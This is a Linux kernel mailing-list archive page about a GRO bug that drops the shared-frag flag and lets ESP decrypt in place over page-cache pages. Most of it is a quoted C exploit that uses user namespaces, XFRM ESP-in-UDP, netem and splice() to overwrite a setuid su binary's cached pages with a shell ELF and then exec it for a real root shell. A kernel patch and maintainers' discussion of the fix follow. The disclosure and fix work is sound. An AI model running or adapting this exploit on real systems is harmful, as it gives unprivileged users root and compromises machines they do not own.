> 	attr.t = 6; attr.c = 2;
> 	attr.i = (uint64_t)(unsigned long)prog;
> 	attr.l = (uint64_t)(unsigned long)lic;
> 	int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr));
> 	if (fd < 0) return;
> 	xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE);
> 	close(fd);
> 	int m1 = -1;
> 	xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE);
> }
> 
> /* ---- user namespace ---- */
> 
> static void setup_userns(void)
> {
> 	uid_t uid = getuid();
> 	gid_t gid = getgid();
> 	int rp[2], mp[2];
> 	if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe");
> 	pid_t c = fork();
> 	if (c < 0) die("fork");
> 	if (c == 0) {
> 		char path[64], map[64]; pid_t pp = getppid();
> 		close(rp[1]); close(mp[0]); sync_read(rp[0]);
> 		snprintf(path, sizeof(path), "/proc/%d/setgroups", pp);
> 		int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); }
> 		snprintf(path, sizeof(path), "/proc/%d/uid_map", pp);
> 		snprintf(map, sizeof(map), "0 %u 1\n", uid);
> 		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
> 		snprintf(path, sizeof(path), "/proc/%d/gid_map", pp);
> 		snprintf(map, sizeof(map), "0 %u 1\n", gid);
> 		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
> 		sync_write(mp[1]); _exit(0);
> 	}
> 	close(rp[0]); close(mp[1]);
> 	if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)");
> 	sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0);
> 	setresgid(0, 0, 0); setresuid(0, 0, 0);
> }
> 
> /* ---- XFRM SA ---- */
> 
> static void add_sa(void)
> {
> 	char buf[4096] = {};
> 	char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)];
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));
> 	nlh->nlmsg_type = XFRM_MSG_NEWSA;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
> 	struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
> 	xs->sel.family = AF_INET;
> 	inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4);
> 	inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4);
> 	xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP;
> 	xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0;
> 	xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF;
> 	xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF;
> 	memset(ab, 0, sizeof(ab));
> 	struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab;
> 	strcpy(a->alg_name, "rfc4106(gcm(aes))");
> 	a->alg_key_len = sizeof(xfrm_key) * 8;
> 	a->alg_icv_len = ICV_LEN * 8;
> 	memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key));
> 	add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab));
> 	struct xfrm_encap_tmpl encap = {};
> 	encap.encap_type = UDP_ENCAP_ESPINUDP;
> 	encap.encap_sport = htons(UDP_PORT);
> 	encap.encap_dport = htons(UDP_PORT);
> 	add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap));
> 	nl_talk(nlh, NETLINK_XFRM, "add SA");
> }
> 
> /* ---- AES-GCM keystream ---- */
> 
> static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16])
> {
> 	char cb[CMSG_SPACE(sizeof(uint32_t))] = {};
> 	struct iovec iov = { (void *)in, 16 };
> 	struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) };
> 	uint32_t op = ALG_OP_ENCRYPT;
> 	struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
> 	cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP;
> 	cm->cmsg_len = CMSG_LEN(sizeof(op));
> 	memcpy(CMSG_DATA(cm), &op, sizeof(op));
> 	int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC);
> 	if (ofd < 0) die("AF_ALG accept");
> 	if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send");
> 	if (read(ofd, out, 16) != 16) die("AF_ALG read");
> 	close(ofd);
> }
> 
> /*
>  * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM
>  * ciphertext starts at frag byte 0. The target byte is at CTR position 0.
>  */
> #define KS_POS 0
> 
> static uint16_t stream_nonce[256];
> static bool stream_have[256];
> 
> static void build_stream_table(void)
> {
> 	struct sockaddr_alg sa = { .salg_family = AF_ALG };
> 	strcpy((char *)sa.salg_type, "skcipher");
> 	strcpy((char *)sa.salg_name, "ecb(aes)");
> 	int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> 	if (fd < 0) die("AF_ALG");
> 	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind");
> 	if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key");
> 
> 	unsigned int count = 0;
> 	for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) {
> 		unsigned char iv[8], cb[16], out[16];
> 		memset(iv, 0xcc, sizeof(iv));
> 		store_be32(iv + 4, nonce);
> 		memcpy(cb, &xfrm_key[16], 4);
> 		memcpy(cb + 4, iv, 8);
> 		store_be32(cb + 12, 2 + KS_POS / 16);
> 		aes_ecb_block(fd, cb, out);
> 		unsigned char b = out[KS_POS % 16];
> 		if (stream_have[b]) continue;
> 		stream_have[b] = true;
> 		stream_nonce[b] = (uint16_t)nonce;
> 		count++;
> 	}
> 	close(fd);
> 	if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); }
> }
> 
> /* ---- main ---- */
> 
> int main(void)
> {
> 	setvbuf(stdout, NULL, _IONBF, 0);
> 
> 	printf("[*] uid=%d euid=%d gid=%d egid=%d\n",
> 	       getuid(), geteuid(), getgid(), getegid());
> 	printf("[*] mode=gro_espinudp_pagecache_replace\n\n");
> 
> 	struct stat st;
> 	if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN)
> 		die("stat target");
> 
> 	printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size);
> 
> 	build_stream_table();
> 	printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS);
> 
> 	/*
> 	 * Fork before entering the user namespace. The child enters the
> 	 * user/net namespace and does all the page-cache corruption. The
> 	 * parent stays in the init user namespace so that execve() of the
> 	 * corrupted setuid su binary honors the setuid bit, giving a real
> 	 * root shell rather than a fake namespace-root shell.
> 	 */
> 	fflush(stdout); fflush(stderr);
> 	pid_t worker = fork();
> 	if (worker < 0) die("fork worker");
> 	if (worker > 0) {
> 		int wstatus;
> 		waitpid(worker, &wstatus, 0);
> 		if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) {
> 			char *argv[] = { (char *)target_file, NULL };
> 			char *envp[] = { NULL };
> 			execve(target_file, argv, envp);
> 		}
> 		return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : 2;
> 	}
> 
> 	/* Child: enter user namespace and do the corruption */
> 	if (getuid() != 0) setup_userns();
> 	if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
> 	if_up("lo");
> 	create_veth();
> 
> 	int p_ns[2], p_veth[2], p_rdy[2];
> 	if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe");
> 	fflush(stdout); fflush(stderr);
> 
> 	pid_t rx = fork();
> 	if (rx < 0) die("fork");
> 
> 	if (rx == 0) {
> 		close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]);
> 		if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
> 		if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)");
> 		mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL);
> 		mount("sysfs", "/sys", "sysfs", 0, NULL);
> 		sync_write(p_ns[1]); close(p_ns[1]);
> 		sync_read(p_veth[0]); close(p_veth[0]);
> 		if_up("lo");
> 		ethtool_set(VETH1, ETHTOOL_SGRO, 1);
> 		if_up(VETH1);
> 		enable_veth_napi(VETH1);
> 		add_addr(VETH1, ADDR_DST);
> 		add_sa();
> 		int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 		if (ufd < 0) gate_fail("socket");
> 		struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
> 		inet_pton(AF_INET, ADDR_DST, &ba.sin_addr);
> 		if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind");
> 		int et = UDP_ENCAP_ESPINUDP, gro = 1;
> 		setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et));
> 		setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro));
> 		sync_write(p_rdy[1]);
> 		pause();
> 		_exit(0);
> 	}
> 
> 	close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]);
> 	sync_read(p_ns[0]); close(p_ns[0]);
> 	move_to_netns(VETH1, rx);
> 	sync_write(p_veth[1]); close(p_veth[1]);
> 	if_up(VETH0); add_addr(VETH0, ADDR_SRC);
> 	ethtool_set(VETH0, ETHTOOL_STSO, 0);
> 	ethtool_set(VETH0, ETHTOOL_SGSO, 0);
> 
> 	/*
> 	 * Add a netem delay on the sender veth so both datagrams sit in the
> 	 * qdisc until the timer fires, then get released into veth_xmit()
> 	 * within the same softirq context. This guarantees both land in one
> 	 * NAPI poll cycle for GRO to merge them, without needing sysfs
> 	 * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the
> 	 * init namespace). tc uses netlink with ns_capable(), so it works
> 	 * from a user namespace.
> 	 */
> 	if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0)
> 		gate_fail("tc netem");
> 	usleep(50000);
> 
> 	sync_read(p_rdy[0]); close(p_rdy[0]);
> 
> 	int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 	if (sock < 0) die("socket");
> 	struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
> 	struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
> 	inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr);
> 	inet_pton(AF_INET, ADDR_DST, &da.sin_addr);
> 	bind(sock, (struct sockaddr *)&sa, sizeof(sa));
> 	connect(sock, (struct sockaddr *)&da, sizeof(da));
> 
> 	int target_fd = open(target_file, O_RDONLY | O_CLOEXEC);
> 	if (target_fd < 0) die("open target");
> 
> 	uint32_t seq = 1;
> 	size_t total_changed = 0;
> 	int delay_ms = 20;
> 	int sleep_us = 40000;
> 	struct timespec last_ok;
> 	clock_gettime(CLOCK_MONOTONIC, &last_ok);
> 
> 	printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN);
> 
> 	/* Warmup: send a dummy pair to prime the netem/NAPI path */
> 	{
> 		unsigned char w[16 + SPLICE_LEN];
> 		memset(w, 0, sizeof(w));
> 		store_be32(w, ESP_SPI);
> 		store_be32(w + 4, seq++);
> 		send(sock, w, sizeof(w), 0);
> 		store_be32(w + 4, seq++);
> 		send(sock, w, sizeof(w), 0);
> 		usleep(sleep_us);
> 	}
> 
> 	for (int pass = 0; ; pass++) {
> 		size_t pass_changed = 0, remaining = 0;
> 
> 		for (int idx = 0; idx < PAYLOAD_LEN; idx++) {
> 			unsigned char cur = read_byte_at(target_fd, idx);
> 			if (cur == shell_elf[idx])
> 				continue;
> 			remaining++;
> 
> 			unsigned char need_ks = cur ^ shell_elf[idx];
> 			uint16_t nonce = stream_nonce[need_ks];
> 			unsigned char iv[8];
> 			memset(iv, 0xcc, sizeof(iv));
> 			store_be32(iv + 4, nonce);
> 
> 			unsigned char hdr[16];
> 			char hp[] = "/tmp/fgro-XXXXXX";
> 			int hfd = mkstemp(hp); unlink(hp);
> 			store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++);
> 			memcpy(hdr + 8, iv, 8);
> 			write(hfd, hdr, 16);
> 
> 			int pfd[2];
> 			pipe(pfd);
> 			loff_t ho = 0;
> 			splice(hfd, &ho, pfd[1], NULL, 16, 0);
> 			loff_t so = (loff_t)idx;
> 			splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0);
> 			close(hfd);
> 
> 			unsigned char p1[16 + SPLICE_LEN];
> 			store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++);
> 			memcpy(p1 + 8, iv, 8);
> 			memset(p1 + 16, 0x41, SPLICE_LEN);
> 			send(sock, p1, sizeof(p1), 0);
> 
> 			int cork = 1;
> 			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
> 			splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0);
> 			cork = 0;
> 			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
> 			close(pfd[0]); close(pfd[1]);
> 
> 			usleep(sleep_us);
> 
> 			unsigned char got = read_byte_at(target_fd, idx);
> 			if (got == shell_elf[idx]) {
> 				total_changed++;
> 				pass_changed++;
> 				clock_gettime(CLOCK_MONOTONIC, &last_ok);
> 				printf("\r[+] byte %3d/%-3d  0x%02x -> 0x%02x  ok  (%zu changed)",
> 				       idx, PAYLOAD_LEN, cur, got, total_changed);
> 			} else {
> 				printf("\r[-] byte %3d/%-3d  0x%02x -> 0x%02x (want 0x%02x) MISS",
> 				       idx, PAYLOAD_LEN, cur, got, shell_elf[idx]);
> 			}
> 			fflush(stdout);
> 		}
> 
> 		if (remaining == 0)
> 			break;
> 
> 		size_t still_wrong = 0;
> 		for (int idx = 0; idx < PAYLOAD_LEN; idx++)
> 			if (read_byte_at(target_fd, idx) != shell_elf[idx])
> 				still_wrong++;
> 
> 		if (still_wrong == 0)
> 			break;
> 
> 		struct timespec now;
> 		clock_gettime(CLOCK_MONOTONIC, &now);
> 		long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 +
> 			       (now.tv_nsec - last_ok.tv_nsec) / 1000000;
> 		if (elapsed > 30000) {
> 			printf("\n[!] %zu bytes stuck after 30s without progress\n",
> 			       still_wrong);
> 			break;
> 		}
> 
> 		if (delay_ms < 500) {
> 			delay_ms = delay_ms < 250 ? delay_ms * 2 : 500;
> 			sleep_us = delay_ms * 2000;
> 			char cmd[128];
> 			snprintf(cmd, sizeof(cmd),
> 				 "tc qdisc change dev " VETH0 " root netem delay %dms",
> 				 delay_ms);
> 			system(cmd);
> 		}
> 		printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n",
> 		       pass + 1, pass_changed, still_wrong, delay_ms);
> 		fflush(stdout);
> 	}
> 
> 	close(target_fd);
> 	close(sock);
> 	kill(rx, SIGTERM);
> 	waitpid(rx, NULL, 0);
> 
> 	/* Final verification: count how many bytes match shell_elf */
> 	int final_fd = open(target_file, O_RDONLY | O_CLOEXEC);
> 	size_t matching = 0;
> 	if (final_fd >= 0) {
> 		for (int i = 0; i < PAYLOAD_LEN; i++)
> 			if (read_byte_at(final_fd, i) == shell_elf[i])
> 				matching++;
> 		close(final_fd);
> 	}
> 
> 	printf("\n\n");
> 	if (total_changed > 0) {
> 		printf("VULNERABLE: %zu/%d payload bytes now match shell_elf "
> 		       "(%zu written via GRO flag-strip)\n",
> 		       matching, PAYLOAD_LEN, total_changed);
> 		_exit(1);
> 	}
> 
> 	printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN);
> 	_exit(0);
> }

> From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001
> From: Sultan Alsawaf <sultan@kerneltoast.com>
> Date: Wed, 13 May 2026 21:47:51 -0700
> Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive()
> 
> skb_gro_receive() moves frag descriptors from the incoming skb to the
> GRO accumulator through two frag-transfer paths (the direct frag-move
> loop and the head_frag + memcpy path) without propagating the
> SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a
> result, the accumulator ends up holding references to externally owned
> or page-cache-backed pages while reporting skb_has_shared_frag() as
> false.
> 
> This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net:
> skbuff: propagate shared-frag marker through frag-transfer helpers"),
> which fixed the identical omission in __pskb_copy_fclone(),
> skb_try_coalesce(), and skb_shift(). skb_gro_receive() was missed in
> that fix since it lives in net/core/gro.c rather than net/core/skbuff.c.
> 
> The impact is observable through ESP-over-UDP with UDP GRO: splice()
> attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via
> ip_append_page(). When two such datagrams are GRO-merged via
> skb_gro_receive(), the flag is dropped. After udp_rcv_segment()
> re-segments the merged GSO skb, the fresh segments carry the
> page-cache frags without the shared-frag marker. esp_input() then sees
> !skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast
> path, decrypting in place over the page-cache pages. Because AES-GCM
> CTR decryption runs before the authentication tag is verified, the
> page cache is corrupted even though the tag check subsequently fails.
> 
> Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the
> accumulator in both frag-transfer paths, matching what the skbuff.c
> helpers already do. The third path (frag_list merge at the "merge:"
> label) chains the entire incoming skb onto the accumulator's frag_list
> without moving individual frag descriptors, so each sub-skb retains
> its own flags and no propagation is needed there.
> 
> Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> Cc: stable@vger.kernel.org
> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
> Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com>
> ---
>  net/core/gro.c | 4 ++++
>  1 file changed, 4 insertions(+)
> 
> diff --git a/net/core/gro.c b/net/core/gro.c
> index 31d21de5b15a7..4ac41ced13aeb 100644
> --- a/net/core/gro.c
> +++ b/net/core/gro.c
> @@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
>  		skb_frag_off_add(frag, offset);
>  		skb_frag_size_sub(frag, offset);
>  
> +		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
> +
>  		/* all fragments truesize : remove (head size + sk_buff) */
>  		new_truesize = SKB_TRUESIZE(skb_end_offset(skb));
>  		delta_truesize = skb->truesize - new_truesize;
> @@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
>  		memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags);
>  		/* We dont need to clear skbinfo->nr_frags here */
>  
> +		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
> +
>  		new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff));
>  		delta_truesize = skb->truesize - new_truesize;
>  		skb->truesize = new_truesize;
> -- 
> 2.54.0
> 


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-14  8:04 ` Paolo Abeni
@ 2026-05-14  9:38   ` Hyunwoo Kim
  2026-05-14 10:21     ` Sabrina Dubroca
  0 siblings, 1 reply; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-14  9:38 UTC (permalink / raw)
  To: Paolo Abeni
  Cc: kuba, steffen.klassert, netdev, stable, mhal, davem, horms,
	edumazet, kerneljasonxing, herbert, vakzz, kuniyu, jiayuan.chen,
	ben, dsahern, Sabrina Dubroca, imv4bel

On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote:
> On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> > skb_shinfo()->flags when moving frags from source to destination.
> > __pskb_copy_fclone() defers the rest of the shinfo metadata to
> > skb_copy_header() after copying frag descriptors, but that helper
> > only carries over gso_{size,segs,type} and never touches
> > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> > descriptors directly and leave flags untouched.  As a result, the
> > destination skb keeps a reference to the same externally-owned or
> > page-cache-backed pages while reporting skb_has_shared_frag() as
> > false.
> > 
> > The mismatch is harmful in any in-place writer that uses
> > skb_has_shared_frag() to decide whether shared pages must be detoured
> > through skb_cow_data().  ESP input is one such writer (esp4.c,
> > esp6.c), and a single nft 'dup to <local>' rule -- or any other
> > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> > skb in esp_input() with the marker stripped, letting an unprivileged
> > user write into the page cache of a root-owned read-only file via
> > authencesn-ESN stray writes.
> > 
> > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> > were actually moved from the source.  skb_copy() and skb_copy_expand()
> > share skb_copy_header() too but linearize all paged data into freshly
> > allocated head storage and emerge with nr_frags == 0, so
> > skb_has_shared_frag() returns false on its own; they need no change.
> > 
> > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> 
> WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need
> additionally/instead a follow-up similar to the one mentioned by Jakub here:
> 
> https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/

Agreed. tracing SKBFL_SHARED_FRAG propagation paths one by one is
not a robust direction for the fix. Even minor logic changes elsewhere
could cause the issue to resurface.

As a follow-up,	eliminating the in-place handling in esp_input -- accepting 
the performance trade-off -- seems necessary. That was actually the
direction of my initial proposal:

https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/


Best regards,
Hyunwoo Kim

^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-14  9:38   ` Hyunwoo Kim
@ 2026-05-14 10:21     ` Sabrina Dubroca
  0 siblings, 0 replies; 6+ messages in thread
From: Sabrina Dubroca @ 2026-05-14 10:21 UTC (permalink / raw)
  To: Hyunwoo Kim
  Cc: Paolo Abeni, kuba, steffen.klassert, netdev, stable, mhal, davem,
	horms, edumazet, kerneljasonxing, herbert, vakzz, kuniyu,
	jiayuan.chen, ben, dsahern

2026-05-14, 18:38:34 +0900, Hyunwoo Kim wrote:
> On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote:
> > On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> > > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> > > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> > > skb_shinfo()->flags when moving frags from source to destination.
> > > __pskb_copy_fclone() defers the rest of the shinfo metadata to
> > > skb_copy_header() after copying frag descriptors, but that helper
> > > only carries over gso_{size,segs,type} and never touches
> > > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> > > descriptors directly and leave flags untouched.  As a result, the
> > > destination skb keeps a reference to the same externally-owned or
> > > page-cache-backed pages while reporting skb_has_shared_frag() as
> > > false.
> > > 
> > > The mismatch is harmful in any in-place writer that uses
> > > skb_has_shared_frag() to decide whether shared pages must be detoured
> > > through skb_cow_data().  ESP input is one such writer (esp4.c,
> > > esp6.c), and a single nft 'dup to <local>' rule -- or any other
> > > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> > > skb in esp_input() with the marker stripped, letting an unprivileged
> > > user write into the page cache of a root-owned read-only file via
> > > authencesn-ESN stray writes.
> > > 
> > > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> > > were actually moved from the source.  skb_copy() and skb_copy_expand()
> > > share skb_copy_header() too but linearize all paged data into freshly
> > > allocated head storage and emerge with nr_frags == 0, so
> > > skb_has_shared_frag() returns false on its own; they need no change.
> > > 
> > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> > > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> > 
> > WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need
> > additionally/instead a follow-up similar to the one mentioned by Jakub here:
> > 
> > https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/
> 
> Agreed. tracing SKBFL_SHARED_FRAG propagation paths one by one is
> not a robust direction for the fix. Even minor logic changes elsewhere
> could cause the issue to resurface.
>
> As a follow-up,	eliminating the in-place handling in esp_input -- accepting 

It would close this group of vulnerabilities, but there are other
parts of the networking stack that consume this flag. For those,
chasing missing flag propagation is still a useful task.

> the performance trade-off -- seems necessary. That was actually the
> direction of my initial proposal:
>
> https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/

But you chose to abandon this approach (I guess because of the AI
feedback Simon forwarded? feedback doesn't necessarily mean "drop this
entirely").

-- 
Sabrina

^ permalink raw reply	[flat|nested] 6+ messages in thread

end of thread, other threads:[~2026-05-14 10:21 UTC | newest]

Thread overview: 6+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
2026-05-14  6:18 ` Sultan Alsawaf
2026-05-14  9:23   ` Hyunwoo Kim
2026-05-14  8:04 ` Paolo Abeni
2026-05-14  9:38   ` Hyunwoo Kim
2026-05-14 10:21     ` Sabrina Dubroca

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox